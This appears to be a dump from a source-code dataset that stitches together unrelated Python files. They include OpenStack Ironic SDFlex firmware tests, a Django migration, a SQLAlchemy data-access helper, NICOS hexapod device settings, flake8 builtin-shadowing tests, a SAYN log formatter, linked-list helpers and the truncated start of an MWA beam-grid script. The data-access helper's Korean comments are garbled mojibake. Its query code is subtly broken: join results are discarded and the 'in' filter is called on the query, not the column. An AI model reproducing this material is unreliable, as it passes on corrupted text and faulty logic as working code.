content stringlengths 5 1.05M |
|---|
# Copyright 2014 Hewlett-Packard Development Company, L.P.
# Copyright 2020-2021 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for Management Interface used by Sdflex modules."""
import mock
from ironic.common import states
from ironic.conductor import task_manager
from ironic.drivers.modules import agent_base
from ironic.drivers import utils as driver_utils
from sdflex_ironic_driver.sdflex_redfish import management as sdflex_management
from sdflex_ironic_driver.tests.unit.sdflex_redfish import test_common \
as sdflex_common
class SDFlexManagementTestCase(sdflex_common.BaseSdflexTest):
def setUp(self):
super(SDFlexManagementTestCase, self).setUp()
@mock.patch.object(agent_base, 'execute_step', autospec=True)
def _test_do_update_firmware_sum(self, execute_mock, step_type='clean'):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
execute_mock.return_value = states.CLEANWAIT
# | GIVEN |
firmware_update_args = {
'url': 'http://any_url',
'checksum': 'xxxx'}
step = {'interface': 'management',
'args': firmware_update_args}
if step_type == 'clean':
step['step'] = 'update_firmware_sum'
task.node.provision_state = states.CLEANING
execute_mock.return_value = states.CLEANWAIT
task.node.clean_step = step
func = task.driver.management.update_firmware_sum
exp_ret_state = states.CLEANWAIT
else:
step['step'] = 'flash_firmware_sum'
task.node.provision_state = states.DEPLOYING
execute_mock.return_value = states.DEPLOYWAIT
task.node.deploy_step = step
func = task.driver.management.flash_firmware_sum
exp_ret_state = states.DEPLOYWAIT
# | WHEN |
return_value = func(task, **firmware_update_args)
# | THEN |
self.assertEqual(exp_ret_state, return_value)
execute_mock.assert_called_once_with(task, step, step_type)
def test_update_firmware_sum(self):
self._test_do_update_firmware_sum(step_type='clean')
def test_flash_firmware_sum(self):
self._test_do_update_firmware_sum(step_type='deploy')
@mock.patch.object(driver_utils, 'store_ramdisk_logs')
def _test__update_firmware_sum_final_with_logs(self, store_mock,
step_type='clean'):
self.config(deploy_logs_collect='always', group='agent')
firmware_update_args = {
'url': 'any_valid_url',
'checksum': 'xxxx'}
step = {'interface': 'management',
'args': firmware_update_args}
if step_type == 'clean':
step['step'] = 'update_firmware_sum'
node_state = states.CLEANWAIT
command = {
'command_status': 'SUCCEEDED',
'command_result': {
'clean_result': {'Log Data': 'aaaabbbbcccdddd'},
'clean_step': step,
}
}
exp_label = 'update_firmware_sum'
else:
step['step'] = 'flash_firmware_sum'
node_state = states.DEPLOYWAIT
command = {
'command_status': 'SUCCEEDED',
'command_result': {
'deploy_result': {'Log Data': 'aaaabbbbcccdddd'},
'deploy_step': step,
}
}
exp_label = 'flash_firmware_sum'
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.provision_state = node_state
task.driver.management._update_firmware_sum_final(
task, command)
store_mock.assert_called_once_with(task.node, 'aaaabbbbcccdddd',
label=exp_label)
def test__update_firmware_sum_final_with_logs_clean(self):
self._test__update_firmware_sum_final_with_logs(step_type='clean')
def test__write_firmware_sum_final_with_logs_deploy(self):
self._test__update_firmware_sum_final_with_logs(step_type='deploy')
@mock.patch.object(driver_utils, 'store_ramdisk_logs')
def _test__update_firmware_sum_final_without_logs(self, store_mock,
step_type='clean'):
self.config(deploy_logs_collect='on_failure', group='agent')
firmware_update_args = {
'url': 'any_valid_url',
'checksum': 'xxxx'}
step = {'interface': 'management',
'args': firmware_update_args}
if step_type == 'clean':
step['step'] = 'update_firmware_sum'
command = {
'command_status': 'SUCCEEDED',
'command_result': {
'clean_result': {'Log Data': 'aaaabbbbcccdddd'},
'clean_step': step,
}
}
else:
step['step'] = 'flash_firmware_sum'
command = {
'command_status': 'SUCCEEDED',
'command_result': {
'deploy_result': {'Log Data': 'aaaabbbbcccdddd'},
'deploy_step': step,
}
}
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.management._update_firmware_sum_final(
task, command)
self.assertFalse(store_mock.called)
def test__update_firmware_sum_final_without_logs_clean(self):
self._test__update_firmware_sum_final_without_logs(step_type='clean')
def test__update_firmware_sum_final_without_logs_deploy(self):
self._test__update_firmware_sum_final_without_logs(step_type='deploy')
@mock.patch.object(sdflex_management, 'LOG', spec_set=True, autospec=True)
@mock.patch.object(driver_utils, 'store_ramdisk_logs')
def _test__update_firmware_sum_final_environment_error(self, store_mock,
log_mock,
step_type='clean'):
self.config(deploy_logs_collect='always', group='agent')
firmware_update_args = {
'url': 'any_valid_url',
'checksum': 'xxxx'}
step = {'interface': 'management',
'args': firmware_update_args}
if step_type == 'clean':
step['step'] = 'update_firmware_sum'
node_state = states.CLEANWAIT
command = {
'command_status': 'SUCCEEDED',
'command_result': {
'clean_result': {'Log Data': 'aaaabbbbcccdddd'},
'clean_step': step,
}
}
else:
step['step'] = 'flash_firmware_sum'
node_state = states.DEPLOYWAIT
command = {
'command_status': 'SUCCEEDED',
'command_result': {
'deploy_result': {'Log Data': 'aaaabbbbcccdddd'},
'deploy_step': step,
}
}
store_mock.side_effect = EnvironmentError('Error')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.provision_state = node_state
task.driver.management._update_firmware_sum_final(
task, command)
self.assertTrue(log_mock.exception.called)
def test__update_firmware_sum_final_environment_error_clean(self):
self._test__update_firmware_sum_final_environment_error(
step_type='clean')
def test__update_firmware_sum_final_environment_error_deploy(self):
self._test__update_firmware_sum_final_environment_error(
step_type='deploy')
@mock.patch.object(sdflex_management, 'LOG', spec_set=True, autospec=True)
@mock.patch.object(driver_utils, 'store_ramdisk_logs')
def _test__update_firmware_sum_final_unknown_exception(self, store_mock,
log_mock,
step_type='clean'):
self.config(deploy_logs_collect='always', group='agent')
firmware_update_args = {
'url': 'any_valid_url',
'checksum': 'xxxx'}
step = {'interface': 'management',
'args': firmware_update_args}
if step_type == 'clean':
step['step'] = 'update_firmware_sum'
node_state = states.CLEANWAIT
command = {
'command_status': 'SUCCEEDED',
'command_result': {
'clean_result': {'Log Data': 'aaaabbbbcccdddd'},
'clean_step': step,
}
}
else:
step['step'] = 'flash_firmware_sum'
node_state = states.DEPLOYWAIT
command = {
'command_status': 'SUCCEEDED',
'command_result': {
'deploy_result': {'Log Data': 'aaaabbbbcccdddd'},
'deploy_step': step,
}
}
store_mock.side_effect = Exception('Error')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.provision_state = node_state
task.driver.management._update_firmware_sum_final(
task, command)
self.assertTrue(log_mock.exception.called)
def test__update_firmware_sum_final_unknown_exception_clean(self):
self._test__update_firmware_sum_final_unknown_exception(
step_type='clean')
def test__update_firmware_sum_final_unknown_exception_deploy(self):
self._test__update_firmware_sum_final_unknown_exception(
step_type='deploy')
|
# Generated by Django 3.1 on 2020-09-23 05:14
from django.db import migrations, models
import django.db.models.deletion
import draftjs_sanitizer
import saleor.core.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
('ushop', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Crawler',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('publication_date', models.DateField(blank=True, null=True)),
('is_published', models.BooleanField(default=False)),
('url', models.URLField(unique=True)),
('completed', models.BooleanField(default=False)),
('crawled_at', models.DateTimeField(auto_now=True, null=True)),
('product_count', models.PositiveSmallIntegerField(blank=True, null=True)),
('json_data', saleor.core.db.fields.SanitizedJSONField(blank=True, default=dict, sanitizer=draftjs_sanitizer.clean_draft_js)),
('json_data_backup', saleor.core.db.fields.SanitizedJSONField(blank=True, default=dict, sanitizer=draftjs_sanitizer.clean_draft_js)),
('listSelection', models.TextField(blank=True)),
('productSelection', models.TextField(blank=True)),
('shop', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='crawlers', to='ushop.shop')),
],
options={
'abstract': False,
},
),
]
|
import os
APP_NAME = os.path.basename(os.path.dirname(__file__))
__version_info__ = (1, 0, 0)
__version__ = ".".join(map(str, __version_info__))
default_app_config = 'csv_manager.apps.CsvManagerConfig' |
from db import session_scope
class DataBaseAccess:
def data_select(self, models, inner_join_list=[], outer_join_list=[], filter_list=None):
self.filter_list = filter_list
with session_scope() as session:
# ํ์ํ ๋ชจ๋ธ๋ค๋ก select๋ฌธ์ ์์ฑํ๋ค.
self.query = session.query(*models)
# join๋ฌธ์ ์ถ๊ฐํ๋ค.
for join in inner_join_list:
self.query.join(*join)
# outerjoin๋ฌธ์ ์ถ๊ฐํ๋ค.
for join in outer_join_list:
self.query.outerjoin(*join)
# ํํฐ ํ์์ ํํฐ๋ฅผ ์ํํ๋ค.
if self.filter_list is not None:
self.__filter()
return self.query
def data_insert(self):
pass
def data_update(self):
pass
def data_delete(self):
pass
def __filter(self):
for raw in self.filter_list:
try:
# ๋ชจ๋ธ, ์ปฌ๋ผ๋ช
, ์กฐ๊ฑด, ๋์ ๊ฐ
model, key, op, value = raw
except ValueError:
raise Exception('ํํฐ ํ์ ๋๋ ๋ฐ์ดํฐ๊ฐ ๋ง์ง ์์ต๋๋ค : %s' % raw)
# ๋ชจ๋ธ ํด๋์ค์ ํ๋(์ปฌ๋ผ)๋ฅผ ๊ฐ์ ธ์จ๋ค.
column = getattr(model, key, None)
if not column:
raise Exception("๋ชจ๋ธ์ %s ํ๋๊ฐ ์์ต๋๋ค." % key)
# ์กฐ๊ฑด์ด in์ด๋ผ๋ฉด ์๋ ์์
์ ์ํํ๋ค.
if op == 'in':
if isinstance(value, list):
filt = self.query.in_(value)
else:
filt = self.query.in_(value.split(','))
# ๊ทธ ์ธ ์กฐ๊ฑด์ ์๋ ์์
์ ์ํํ๋ค.
else:
try:
# ์ปฌ๋ผ์ ๋ฐ๋ผ ์กฐ๊ฑด ๋ณ์๊ฐ ์ด๋ ค๊ฐ ์กด์ฌํ๋ค.
# ๋ชจ๋ ๋์ํ๊ธฐ ์ํด ์๋ ์ ๊ฐ์ด ์ฒดํฌํ๊ณ ์ค์
attr = list(filter(lambda e: hasattr(column, e % op), ['%s', '%s_', '__%s__']))[0] % op
except IndexError:
raise Exception('ํด๋น ์ปฌ๋ผ์๋ {} ์๋ ๋น๊ต์ฐ์ฐ ์
๋๋ค : {}'.format(column, op))
if value == 'null':
value = None
# ์กฐ๊ฑด์ ์ค์ ํ๋ค.
filt = getattr(column, attr)(value)
# ํํฐ ์ฟผ๋ฆฌ๋ฅผ ์ถ๊ฐํ๋ค.
self.query = self.query.filter(filt)
|
# -*- coding: utf-8 -*-
description = 'Collimation hexapod setup'
group = 'lowlevel'
tango_base = 'tango://phys.biodiff.frm2:10000/biodiff/hexapod/'
devices = dict(
collimator_x = device('nicos.devices.entangle.Motor',
description = 'collimator hexapod X axis',
tangodevice = tango_base + 'x',
unit = 'mm',
precision = 0.01,
),
collimator_y = device('nicos.devices.entangle.Motor',
description = 'collimator hexapod Y axis',
tangodevice = tango_base + 'y',
unit = 'mm',
precision = 0.01,
),
collimator_z = device('nicos.devices.entangle.Motor',
description = 'collimator hexapod Z axis',
tangodevice = tango_base + 'z',
unit = 'mm',
precision = 0.01,
),
collimator_arc_x = device('nicos.devices.entangle.Motor',
description = 'collimator hexapod rotation around X axis',
tangodevice = tango_base + 'u',
unit = 'deg',
precision = 0.01,
),
collimator_arc_y = device('nicos.devices.entangle.Motor',
description = 'collimator hexapod rotation around Y axis',
tangodevice = tango_base + 'v',
unit = 'deg',
precision = 0.01,
),
collimator_arc_z = device('nicos.devices.entangle.Motor',
description = 'collimator hexapod rotation around Z axis',
tangodevice = tango_base + 'w',
unit = 'deg',
precision = 0.01,
),
)
|
import pytest
from hamcrest import assert_that, contains_inanyorder
from tests.testing_utils import param_wrapper, run_flake8, run_pylint
params = [
# code, flake8 rules, pylint rules
param_wrapper('max = 4', {'A001'}, {'W0622'}, id='top_level'),
param_wrapper((
'def bla():',
' filter = 4',
), {'A001'}, {'W0622'}, id='variable_inside_function'),
param_wrapper((
'class Bla:',
' def method(self):',
' int = 4',
), {'A001'}, {'W0622'}, id='var_inside_method'),
param_wrapper('bla, *int = range(4)', {'A001'}, {'W0622'}, id='starred_assignment'),
param_wrapper('[bla, int] = range(2)', {'A001'}, {'W0622'}, id='list_assignment'),
param_wrapper((
'for format in (1, 2, 3):',
' continue',
), {'A001', 'B007', 'WPS327', 'WPS328'}, {'W0622'}, id='for_loop'),
param_wrapper((
'for index, format in enumerate([1, 2, 3]):',
' continue',
), {'A001', 'B007', 'WPS327', 'WPS328'}, {'W0622'}, id='for_loop_multiple_variables'),
param_wrapper((
'for [index, format] in enumerate([1, 2, 3]):',
' continue',
), {'A001', 'B007', 'WPS327', 'WPS328', 'WPS405'}, {'W0622'}, id='for_loop_multiple_variables_list'),
param_wrapper((
"for index, (format, list) in enumerate([(1, 'a'), (2, 'b')]):",
' continue',
), {'A001', 'B007', 'WPS221', 'WPS327', 'WPS328', 'WPS405', 'WPS414'}, {'W0622'}, id='for_loop_nested'),
param_wrapper((
"for index, *int in enumerate([(1, 'a'), (2, 'b')]):",
' continue',
), {'A001', 'B007', 'WPS327', 'WPS328'}, {'W0622'}, id='for_loop_starred'),
param_wrapper((
"with open('bla.txt') as dir:",
' pass',
), {'A001', 'WPS328', 'WPS420'}, {'W0622'}, id='with_statement'),
param_wrapper((
"with open('bla.txt') as dir, open('bla.txt') as int:",
' pass',
), {'A001', 'WPS316', 'WPS328', 'WPS420'}, {'W0622'}, id='with_statement_multiple'),
param_wrapper((
"with open('bla.txt') as (dir, bla):",
' pass',
), {'A001', 'WPS328', 'WPS420'}, {'W0622'}, id='with_statement_unpack'),
param_wrapper((
"with open('bla.txt') as [dir, bla]:",
' pass',
), {'A001', 'WPS328', 'WPS406', 'WPS420'}, {'W0622'}, id='with_statement_unpack_list'),
param_wrapper((
"with open('bla.txt') as (bla, *int):",
' pass',
), {'A001', 'WPS328', 'WPS420'}, {'W0622'}, id='with_statement_unpack_star'),
param_wrapper(
'import datetime as int',
{'A001', 'F401'}, {'W0611', 'W0622'}, id='import_as',
),
param_wrapper(
'from datetime import datetime as int',
{'A001', 'F401'}, {'W0611', 'W0622'}, id='import_from_as',
),
param_wrapper((
'class int:',
' pass',
), {'A001', 'N801', 'WPS420', 'WPS604'}, {'W0622'}, id='class_name'),
param_wrapper((
'def int():',
' return 1',
), {'A001'}, {'W0622'}, id='function_name'),
param_wrapper((
'async def int():',
' pass',
), {'A001', 'WPS420'}, {'W0622'}, id='async_function_name'),
param_wrapper((
'async def bla():',
' async for int in range(4):',
' pass',
), {'A001', 'WPS328', 'WPS420'}, {'E1133', 'W0622'}, id='async for'),
param_wrapper((
'async def bla():',
" async with open('bla.txt') as int:",
' pass',
), {'A001', 'WPS328', 'WPS420'}, {'W0622'}, id='async with'),
param_wrapper('[int for int in range(3, 9)]', {'A001'}, {'R1721', 'W0106'}, id='list_comprehension'),
param_wrapper(
'[(int, list) for int, list in enumerate(range(3, 9))]',
{'A001', 'WPS200'}, {'R1721', 'W0106'}, id='list_comprehension_multiple',
),
param_wrapper(
'[(int, a) for [int, a] in enumerate(range(3, 9))]',
{'A001', 'WPS200', 'WPS405'}, {'W0106'}, id='list_comprehension_multiple_as_list',
),
param_wrapper((
'try:',
' a = 2',
'except Exception as int:',
' a = 1',
), {'A001'}, {'W0703'}, id='exception'),
param_wrapper((
'def bla(list):',
' a = 4',
), {'A002'}, {'W0613', 'W0622'}, id='function_parameter'),
param_wrapper((
'def bla(dict=3):',
' a = 4',
), {'A002'}, {'W0613', 'W0622'}, id='function_keyword_parameter'),
param_wrapper((
'class Bla:',
' object = 4',
), {'A003'}, set(), id='class_attribute'),
param_wrapper((
'class Bla:',
' def int(self):',
' pass',
), {'A003', 'WPS420'}, set(), id='method_name'),
]
@pytest.mark.parametrize('content,flake8_errors,pylint_errors', params)
def test_detects_variable_shadowing(content, flake8_errors, pylint_errors, file_to_lint):
file_to_lint.write_text(content)
found_flake8_errors = run_flake8(file_to_lint)
assert_that(set(found_flake8_errors), contains_inanyorder(*flake8_errors))
found_pylint_errors = run_pylint(file_to_lint)
assert_that(set(found_pylint_errors), contains_inanyorder(*pylint_errors))
|
from datetime import date, datetime, timedelta
import traceback
from colorama import init, Fore, Style
from ..utils.misc import group_list
init(autoreset=True)
def human(obj):
if isinstance(obj, timedelta):
secs = obj.total_seconds()
mins = secs / 60.0
hours = mins / 60.0
if hours > 1.0:
r = str(round(hours, 1))
return f"{r if r[-1] != '0' else r[:-2]}h"
if mins > 1.0:
r = str(round(mins, 1))
return f"{r if r[-1] != '0' else r[:-2]}m"
elif secs > 1.0:
r = str(round(secs, 1))
return f"{r if r[-1] != '0' else r[:-2]}s"
else:
msecs = secs * 1000.0
r = str(round(msecs, 1))
return f"{r if r[-1] != '0' else r[:-2]}ms"
elif isinstance(obj, datetime):
return obj.strftime("%H:%M")
elif isinstance(obj, str):
return obj.replace("_", " ").title()
else:
return obj
class LogFormatter:
use_colour = True
use_icons = True
output_ts = False
def __init__(self, use_colour=True, use_icons=True, output_ts=False):
self.use_colour = use_colour
self.output_ts = output_ts
self.use_icons = True
# Styling methods
def dim(self, s):
if self.use_colour:
return f"{Style.DIM}{s}{Style.NORMAL}"
else:
return s
def bright(self, s):
if self.use_colour:
return f"{Style.BRIGHT}{s}{Style.NORMAL}"
else:
return s
def red(self, s):
if self.use_colour:
return f"{Fore.RED}{s}{Fore.RESET}"
else:
return s
def bright_red(self, s):
if self.use_colour:
return f"{Fore.RED}{Style.BRIGHT}{s}{Style.NORMAL}{Fore.RESET}"
else:
return s
def yellow(self, s):
if self.use_colour:
return f"{Fore.YELLOW}{s}{Fore.RESET}"
else:
return s
def bright_yellow(self, s):
if self.use_colour:
return f"{Fore.YELLOW}{Style.BRIGHT}{s}{Style.NORMAL}{Fore.RESET}"
else:
return s
def green(self, s):
if self.use_colour:
return f"{Fore.GREEN}{s}{Fore.RESET}"
else:
return s
def bright_green(self, s):
if self.use_colour:
return f"{Fore.GREEN}{Style.BRIGHT}{s}{Style.NORMAL}{Fore.RESET}"
else:
return s
def indent(self, s, l):
if self.use_colour:
return " " * l + s
else:
return s
def good(self, s):
if self.use_colour and self.use_icons:
return self.green(f"โ {s}")
else:
return s
def info(self, s):
if self.use_colour and self.use_icons:
return f"โน {s}"
else:
return s
def warn(self, s):
if self.use_colour and self.use_icons:
return self.yellow(f"โ {s}")
else:
return s
def bad(self, s):
if self.use_colour and self.use_icons:
return self.red(f"โ {s}")
else:
return s
def join(self, l, sep, f):
if self.use_colour:
return sep.join(f(s) for s in l)
else:
return sep.join(l)
def blist(self, l):
if self.use_colour:
return self.join(l, ", ", self.bright)
else:
return ", ".join(l)
# Event handling methods
def unhandled(self, event, context, stage, details):
ignored = (
"project_git_commit",
"sayn_version",
"project_name",
"ts",
"run_id",
"task",
"task_order",
"total_tasks",
)
ctx = details["task"] if context == "task" else context
return {
"level": "error",
"message": f"Unhandled: {ctx}::{stage}::{event}: "
+ {k: v for k, v in details.items() if k not in ignored}.__str__(),
}
def message(self, level, message, details):
if not isinstance(message, list):
message = [message]
out = []
ts = f"[{human(details['ts'])}]" if self.output_ts else ""
for m in message:
if level == "error":
out.append(self.bad(f"{ts} {m}"))
elif level == "warning":
out.append(self.warn(f"{ts} {m}"))
elif level == "debug":
out.append(self.dim(f"{ts} {m}"))
else:
out.append(f"{ts} {m}")
return {"level": level, "message": out}
def error_result(self, duration, error): # noqa: C901
level = "error"
message = self.bad(error.__str__())
duration = human(duration)
if error.kind == "exception":
exc = error.details["exception"]
message = [self.bad(f"Failed ({duration}) {exc}")]
message.extend(
[
self.red(l)
for it in traceback.format_exception(
etype=type(exc), value=exc, tb=exc.__traceback__
)
for l in it.split("\n")
]
)
elif error.kind == "dag" and error.code == "cycle_error":
level = "error"
message = self.bad(
f"A cycle was detected in the dag: {' > '.join(error.details['path'])}"
)
elif error.kind == "dag" and error.code == "missing_parents":
level = "error"
message = ["Some parents are missing from dag"] + [
self.red(f"In task {self.bright(task)}: {', '.join(parents)}")
for task, parents in error.details["missing"].items()
]
elif error.code == "wrong_credentials":
level = "error"
message = self.bad(
f'Connections {self.bright(", ".join(error.details["credentials"]))} not defined in project.yaml'
)
elif error.code == "missing_credentials":
level = "error"
message = self.bad(
f'Connections {self.bright(", ".join(error.details["credentials"]))} are required by project.yaml'
)
elif error.code == "missing_credential_type":
level = "error"
message = self.bad(
f'Connections {self.bright(", ".join(error.details["credentials"]))} have no type'
)
elif error.kind == "tasks" and error.code == "task_fail":
level = "error"
message = self.bad(error.details["message"])
elif error.code == "parent_errors":
level = "warning"
parents = ", ".join(
[f"{p} ({s.value})" for p, s in error.details["failed_parents"].items()]
)
message = self.warn(
f"Skipping due to ancestors errors: {parents} ({duration})"
)
elif error.code == "setup_error":
if error.details["status"].value == "skipped":
level = "warning"
message = self.warn(f"Skipping due to parent errors ({duration})")
else:
level = "error"
message = self.bad(f"Failed during setup ({duration})")
elif error.code == "validation_error":
level = "error"
message = [self.bad(f"Validation errors found ({duration})")]
message.extend(
[
self.red(f" In {' > '.join(e['loc'])}: {e['msg']}")
for e in error.details["errors"]
]
)
elif error.code == "sql_execution_error" and "message" in error.details:
level = "error"
message = self.bad(error.details["message"])
elif error.kind == "database" and error.code == "operational_error":
level = "error"
message = self.bad(error.details["message"])
elif error.kind == "parsing" and "filename" in error.details:
level = "error"
if "error" in error.details:
message = self.bad(
f"""Parsing error in file: {error.details['filename']}
Details: {error.details['error']}
Line: {error.details['line']}"""
)
else:
message = self.bad(f"File not found: {error.details['filename']}")
elif error.kind == "task_type" and error.code == "invalid_task_type_error":
level = "error"
group = error.details["group"]
task_type = error.details["type"]
message = self.bad(
f"""Task error in task group: {group}. Invalid task type: {task_type}.
Current Valid Task Types:
- autosql
- sql
- python
- copy
- dummy
For more details please check SAYN documentation: https://173tech.github.io/sayn/tasks/overview/
"""
)
elif (
error.kind == "python_loader"
and error.code == "load_class_exception"
and "exception" in error.details
):
level = "error"
message = self.bad(str(error.details["exception"]))
elif (
error.kind == "python_loader"
and error.code == "missing_class"
and "pyclass" in error.details
):
level = "error"
path = error.details["module_path"]
if len(path) > 0:
message = self.bad(
f"Error in file: {error.details['module_path']}.py. Missing Class: {error.details['pyclass']}."
)
else:
message = self.bad(f"Invalid path: {error.details['pyclass']}")
return {
"level": level,
"message": message,
}
# App context
def app_start(self, details):
debug = "(debug)" if details["run_arguments"]["debug"] else ""
yesterday = date.today() - timedelta(days=1)
if details["run_arguments"]["full_load"]:
dt_range = "Full Load"
elif (
details["run_arguments"]["start_dt"] == details["run_arguments"]["end_dt"]
and details["run_arguments"]["end_dt"] == yesterday
):
dt_range = "Default"
elif details["run_arguments"]["start_dt"] == details["run_arguments"]["end_dt"]:
dt_range = f"{details['run_arguments']['start_dt']}"
else:
dt_range = f"{details['run_arguments']['start_dt']} to {details['run_arguments']['end_dt']}"
out = list()
out.append(f"Starting sayn {debug}")
out.append(f"Run ID: {details['run_id']}")
out.append(f"Project: {details['project_name']}")
out.append(f"Sayn version: {details['sayn_version']}")
if details["project_git_commit"] is not None:
out.append(f"Git commit: {details['project_git_commit']}")
out.append(f"Period: {dt_range}")
out.append(
f"{'Profile: ' + (details['run_arguments'].get('profile') or 'Default')}"
)
return {"level": "info", "message": out}
def app_finish(self, details):
if "error" in details:
return self.error_result(details["duration"], details["error"].error)
else:
errors = details["tasks"].get("failed", list()) + details["tasks"].get(
"skipped", list()
)
msg = f"Execution of SAYN took {human(details['duration'])}"
if len(errors) > 0:
return {"level": "error", "message": self.bad(msg)}
else:
return {"level": "info", "message": self.good(msg)}
def app_stage_start(self, stage, details):
if stage == "setup":
return {"level": "info", "message": "Setting up..."}
elif stage in ("run", "compile"):
return {
"level": "info",
"message": self.bright(
f"Starting {stage} at {details['ts'].strftime('%H:%M')}..."
),
}
else:
return self.unhandled("start_stage", "app", stage, details)
def app_stage_finish(self, stage, details):
tasks = group_list([(v.value, t) for t, v in details["tasks"].items()])
failed = tasks.get("failed", list())
succeeded = tasks.get("ready", list()) + tasks.get("succeeded", list())
skipped = tasks.get("skipped", list())
duration = human(details["duration"])
totals_msg = (
f"Total tasks: {len(succeeded+failed+skipped)}. "
f"Success: {len(succeeded)}. Failed {len(failed)}. Skipped {len(skipped)}."
)
if stage == "setup":
out = ["Finished setup:"]
level = "info"
if len(failed) > 0:
out.append(self.bad(f"Tasks failed: {self.blist(failed)}"))
level = "error"
if len(skipped) > 0:
out.append(self.warn(f"Tasks to skip: {self.blist(skipped)}"))
level = "error"
if len(succeeded) > 0:
out.append(self.good(f"Tasks to run: {self.blist(succeeded)}"))
return {"level": level, "message": out}
elif stage in ("run", "compile"):
if len(failed) > 0 or len(skipped) > 0:
out = [
self.red(
f"There were some errors during {stage} (took {duration})"
),
self.red(totals_msg),
]
if len(failed) > 0:
out.append(self.bad(f"Failed: {self.blist(failed)}"))
if len(skipped) > 0:
out.append(self.warn(f"Skipped: {self.blist(skipped)}"))
return {"level": "error", "message": out}
else:
return {
"level": "info",
"message": [
self.good(totals_msg),
self.good(
f"{stage.capitalize()} finished successfully in {duration}"
),
f"Tasks executed: {self.blist(succeeded)}",
],
}
else:
return self.unhandled("finish_stage", "app", stage, details)
# Task context
def task_set_steps(self, details):
return {
"level": "info",
"message": f"Run Steps: {self.blist(details['steps'])}",
}
def task_stage_start(self, stage, task, task_order, total_tasks, details):
task_progress = f"[{task_order}/{total_tasks}]"
ts = human(details["ts"])
if stage == "setup":
return {"level": "info", "message": f"{task_progress} {self.bright(task)}"}
elif stage in ("run", "compile"):
return {
"level": "info",
"message": f"{self.bright(task_progress +' ' +task)} (started at {ts})",
}
else:
return self.unhandled("start_stage", "task", stage, details)
def task_stage_finish(self, stage, task, task_order, total_tasks, details):
duration = human(details["duration"])
if details["result"].is_ok:
return {
"level": "info",
"message": self.good(f"Took ({duration})"),
}
else:
return self.error_result(details["duration"], details["result"].error)
def task_step_start(self, stage, task, step, step_order, total_steps, details):
task_progress = f"[{step_order}/{total_steps}]"
ts = f"[{human(details['ts'])}]" if self.output_ts else ""
if stage in ("run", "compile"):
return {
"level": "info",
"message": self.info(
f"{task_progress} {ts} Executing {self.bright(step)}"
),
}
else:
return self.unhandled("start_step", "task", stage, details)
def task_step_finish(self, stage, task, step, step_order, total_steps, details):
task_progress = f"[{step_order}/{total_steps}]"
ts = f"[{human(details['ts'])}]" if self.output_ts else ""
duration = human(details["duration"])
if details["result"].is_ok:
return {
"level": "info",
"message": self.good(
f"{task_progress}" + f" {ts} {self.bright(step)} ({duration})"
),
}
else:
return self.error_result(details["duration"], details["result"].error)
|
from typing import List
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
def __eq__(self, other):
if not isinstance(other, ListNode):
return False
return self.val == other.val and self.next == other.next
def __repr__(self):
return f'Node({self.val})'
def construct_linkedlist(values: List, pos=None):
"""
Construct a linked list from list
:param pos: if there is a cycle in the linked list, pass the index of the node that the last node should point to.
"""
previous = head = pos_node = None
for i in range(len(values)):
current = ListNode(values[i])
if not head:
head = current
if previous:
previous.next = current
previous = current
if i == pos:
pos_node = current
if i == len(values) - 1:
current.next = pos_node
return head
def construct_multi_list(values: List[List]) -> List[ListNode]:
result = []
for value in values:
result.append(construct_linkedlist(value))
return result
|
#!/usr/bin/env python3
import argparse
from astropy.coordinates import SkyCoord,EarthLocation,AltAz
from astropy.time import Time
import astropy.units as u
from math import cos
import numpy as np
from matplotlib import use
use('Agg')
import matplotlib.pyplot as plt
from matplotlib import patches
from mwa_pb.mwa_tile import h2e
# vcstools imports
import vcstools.metadb_utils as meta
from vcstools.catalogue_utils import get_psrcat_ra_dec
from vcstools.pointing_utils import sex2deg, format_ra_dec
from vcstools.beam_calc import get_beam_power_over_time
# mwa_search imports
from mwa_search.obs_tools import getTargetAZZA
from mwa_search.grid_tools import get_grid
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="""
Makes a hexogonal grid pattern around a pointing for a MWA VCS observation.
grid.py -o 1166459712 -p "06:25:31.20 -36:40:48.0" -d 0.6 -l 1
""")
parser.add_argument('-o', '--obsid',type=str,help='Observation ID')
parser.add_argument('-p', '--pointing',type=str,help='Centre pointing in hh:mm:ss.ss_dd\"mm\'ss.ss')
parser.add_argument('--aitoff',action="store_true",help='Plots the output in aitoff (may make it hard to analyise).')
parser.add_argument('-f', '--fraction',type=float,help='Fraction of the full width half maximum to use as the distance between beam centres',default=0.85)
parser.add_argument('-d', '--deg_fwhm',type=float,help='Sets the FWHM at zenith in degrees (best to test along dec). The script will not calculate the FWHM',default=0.3098)
parser.add_argument('--dec_range_fwhm',type=float,nargs='+',help='A list of FWHM and ranges in the order of: "FWHM1 decmin1 decmax1 FWHM2 decmin2 decmax2"')
parser.add_argument('-t', '--type',type=str,help='Can be put in either "hex" or "square" tiling mode. Default is hex.',default='hex')
parser.add_argument('-l', '--loop',type=int,help='Number of "loops" around the centre pointing the code will calculate. Default is 1',default=1)
parser.add_argument('--fill',type=float,help='Calculate the number of loops required to fill a circle of the input radius in degrees.')
parser.add_argument('-a','--all_pointings',action="store_true",help='Will calculate all the pointings within the FWHM of the observations tile beam.')
parser.add_argument('-b', '--begin',type=int,help='Begin time of the obs for the --all_pointings options')
parser.add_argument('-e', '--end',type=int,help='End time of the obs for the --all_pointings options')
parser.add_argument('--dec_range',type=float,nargs='+',help='Dec limits: "decmin decmax". Default -90 90', default=[-90,90])
parser.add_argument('--ra_range',type=float,nargs='+',help='RA limits: "ramin ramax". Default 0 360', default=[0,360])
